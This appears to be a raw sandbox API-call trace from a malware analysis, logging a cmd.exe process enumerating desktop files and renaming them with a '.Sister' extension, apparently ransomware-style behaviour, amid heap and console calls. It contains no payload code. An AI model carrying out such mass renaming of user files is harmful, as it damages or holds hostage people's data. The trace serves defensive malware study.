??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0162.544] ??_V@YAXPEAX@Z () returned 0x1 [0162.544] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0162.583] FindNextFileW (in: hFindFile=0x21ed8d65460, lpFindFileData=0x21ed9372720 | out: lpFindFileData=0x21ed9372720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966, dwReserved0=0x0, dwReserved1=0x0, cFileName="NbugXFY9poFh8.gif", cAlternateFileName="")) returned 0 [0162.585] GetLastError () returned 0x12 [0162.585] FindClose (in: hFindFile=0x21ed8d65460 | out: hFindFile=0x21ed8d65460) returned 1 [0162.585] ??_V@YAXPEAX@Z () returned 0x1 [0162.585] ??_V@YAXPEAX@Z () returned 0x1 [0162.586] ??_V@YAXPEAX@Z () returned 0x1 [0162.587] ??_V@YAXPEAX@Z () returned 0x1 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d654c0 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95780, Size=0x16) returned 0x21ed8c95a80 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a80) returned 0x16 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d646f0 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d646f0, Size=0xb2) returned 0x21ed8d646f0 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d646f0) returned 0xb2 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9461a60 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9461a60, Size=0x30) returned 0x21ed9461a60 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9461a60) returned 0x30 [0162.587] GetProcessHeap () returned 0x21ed8c70000 [0162.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9461aa0 [0162.588] malloc (_Size=0x1ff9c) returned 0x21ed9580080 [0162.588] GetProcessHeap () returned 0x21ed8c70000 [0162.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c550 [0162.588] GetProcessHeap () returned 0x21ed8c70000 [0162.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937d2d0 [0162.589] ??_V@YAXPEAX@Z () returned 0x1 [0162.589] malloc (_Size=0x1ff9c) returned 0x21ed9580080 [0162.589] GetProcessHeap () returned 0x21ed8c70000 [0162.589] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ce50 [0162.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed9580080, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0162.589] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c75ae0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d658e0 [0162.589] FindClose (in: hFindFile=0x21ed8d658e0 | out: hFindFile=0x21ed8d658e0) returned 1 [0162.589] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c75ae0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64f20 [0162.589] FindClose (in: hFindFile=0x21ed8d64f20 | out: hFindFile=0x21ed8d64f20) returned 1 [0162.589] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8b7e4177, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8b7e4177, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c75ae0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65340 [0162.589] FindClose (in: hFindFile=0x21ed8d65340 | out: hFindFile=0x21ed8d65340) returned 1 [0162.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8b7e4177, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8b7e4177, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c75ae0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0162.590] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0162.590] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0162.591] GetProcessHeap () returned 0x21ed8c70000 [0162.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67ab0 [0162.591] ??_V@YAXPEAX@Z () returned 0x1 [0162.591] ??_V@YAXPEAX@Z () returned 0x1 [0162.591] GetProcessHeap () returned 0x21ed8c70000 [0162.591] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9461aa0, Size=0x490) returned 0x21ed9461aa0 [0162.591] GetProcessHeap () returned 0x21ed8c70000 [0162.591] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9461aa0) returned 0x490 [0162.592] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0162.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.592] GetFileType (hFile=0x50) returned 0x2 [0162.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0162.592] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0162.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.692] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0162.808] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0162.808] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0162.808] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0162.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.808] GetFileType (hFile=0x50) returned 0x2 [0162.808] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0162.808] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0162.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.932] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0163.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.023] GetFileType (hFile=0x50) returned 0x2 [0163.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0163.023] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0163.235] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.235] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9461a70*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9461a70*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0163.322] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0163.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.322] GetFileType (hFile=0x50) returned 0x2 [0163.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0163.322] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0163.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.407] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0163.526] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0163.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.526] GetFileType (hFile=0x50) returned 0x2 [0163.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0163.527] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0163.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0163.894] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0164.009] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0164.009] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0164.009] malloc (_Size=0xffce) returned 0x21ed9580080 [0164.009] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0164.009] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0164.009] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0164.009] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0164.009] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0164.009] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0164.009] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0164.009] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0164.009] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0164.009] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0164.009] ??_V@YAXPEAX@Z () returned 0x1 [0164.009] GetProcessHeap () returned 0x21ed8c70000 [0164.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937e770 [0164.010] GetProcessHeap () returned 0x21ed8c70000 [0164.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e770, Size=0x130) returned 0x21ed937e770 [0164.010] GetProcessHeap () returned 0x21ed8c70000 [0164.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e770) returned 0x130 [0164.010] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.010] malloc (_Size=0xffce) returned 0x21ed9580080 [0164.010] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0164.010] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0164.010] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed9580080, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0164.012] ??_V@YAXPEAX@Z () returned 0x1 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62d10 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937e8b0 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e8b0, Size=0x130) returned 0x21ed937e8b0 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e8b0) returned 0x130 [0164.012] malloc (_Size=0xffce) returned 0x21ed9580080 [0164.012] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64e00 [0164.012] GetProcessHeap () returned 0x21ed8c70000 [0164.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93746c0 [0164.012] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0164.013] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0164.013] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0164.013] GetLastError () returned 0x2 [0164.013] GetProcessHeap () returned 0x21ed8c70000 [0164.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9461f40 [0164.013] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9461f50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0164.013] SetErrorMode (uMode=0x0) returned 0x0 [0164.013] SetErrorMode (uMode=0x1) returned 0x0 [0164.013] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed9580080, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0164.013] SetErrorMode (uMode=0x0) returned 0x1 [0164.013] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0164.013] GetProcessHeap () returned 0x21ed8c70000 [0164.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9374ba0 [0164.013] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0164.013] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0164.014] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0164.014] GetLastError () returned 0x2 [0164.014] ??_V@YAXPEAX@Z () returned 0x1 [0164.014] malloc (_Size=0xffce) returned 0x21ed9580080 [0164.014] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0164.014] malloc (_Size=0xffce) returned 0x21ed9590060 [0164.014] ??_V@YAXPEAX@Z () returned 0x21ed9590060 [0164.014] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0164.014] GetLastError () returned 0x2 [0164.014] _get_osfhandle (_FileHandle=2) returned 0x54 [0164.014] GetFileType (hFile=0x54) returned 0x2 [0164.014] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0164.014] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0164.334] _get_osfhandle (_FileHandle=2) returned 0x54 [0164.334] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0164.408] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0164.408] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0164.408] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0164.501] longjmp () [0164.501] ??_V@YAXPEAX@Z () returned 0x1 [0164.501] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6163570, ftCreationTime.dwHighDateTime=0x1d5eea2, ftLastAccessTime.dwLowDateTime=0xf2a3edf0, ftLastAccessTime.dwHighDateTime=0x1d5e1fe, ftLastWriteTime.dwLowDateTime=0xf2a3edf0, ftLastWriteTime.dwHighDateTime=0x1d5e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="NEMp0xRZwYzRkcTKt", cAlternateFileName="")) returned 1 [0164.501] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="NMgihtIW4j90xeC_.mkv", cAlternateFileName="")) returned 1 [0164.501] GetProcessHeap () returned 0x21ed8c70000 [0164.501] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e450, Size=0x33a) returned 0x21ed937e9f0 [0164.501] GetProcessHeap () returned 0x21ed8c70000 [0164.501] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e9f0) returned 0x33a [0164.501] GetProcessHeap () returned 0x21ed8c70000 [0164.501] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9471f30 [0164.501] GetProcessHeap () returned 0x21ed8c70000 [0164.501] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9471f30, Size=0x30) returned 0x21ed9471f30 [0164.501] GetProcessHeap () returned 0x21ed8c70000 [0164.501] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9471f30) returned 0x30 [0164.502] GetProcessHeap () returned 0x21ed8c70000 [0164.502] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9471f70 [0164.502] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bda0 [0164.503] ??_V@YAXPEAX@Z () returned 0x1 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9471f70, Size=0x1c0) returned 0x21ed9471f70 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9471f70) returned 0x1c0 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9472140 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9472140, Size=0x290) returned 0x21ed9472140 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9472140) returned 0x290 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94723e0 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94723e0, Size=0x30) returned 0x21ed94723e0 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94723e0) returned 0x30 [0164.503] GetProcessHeap () returned 0x21ed8c70000 [0164.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9472420 [0164.503] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0164.504] GetProcessHeap () returned 0x21ed8c70000 [0164.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bd50 [0164.504] ??_V@YAXPEAX@Z () returned 0x1 [0164.504] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0164.504] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65160 [0164.504] FindClose (in: hFindFile=0x21ed8d65160 | out: hFindFile=0x21ed8d65160) returned 1 [0164.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d650a0 [0164.504] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0164.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8b7e4177, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8b7e4177, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65640 [0164.504] 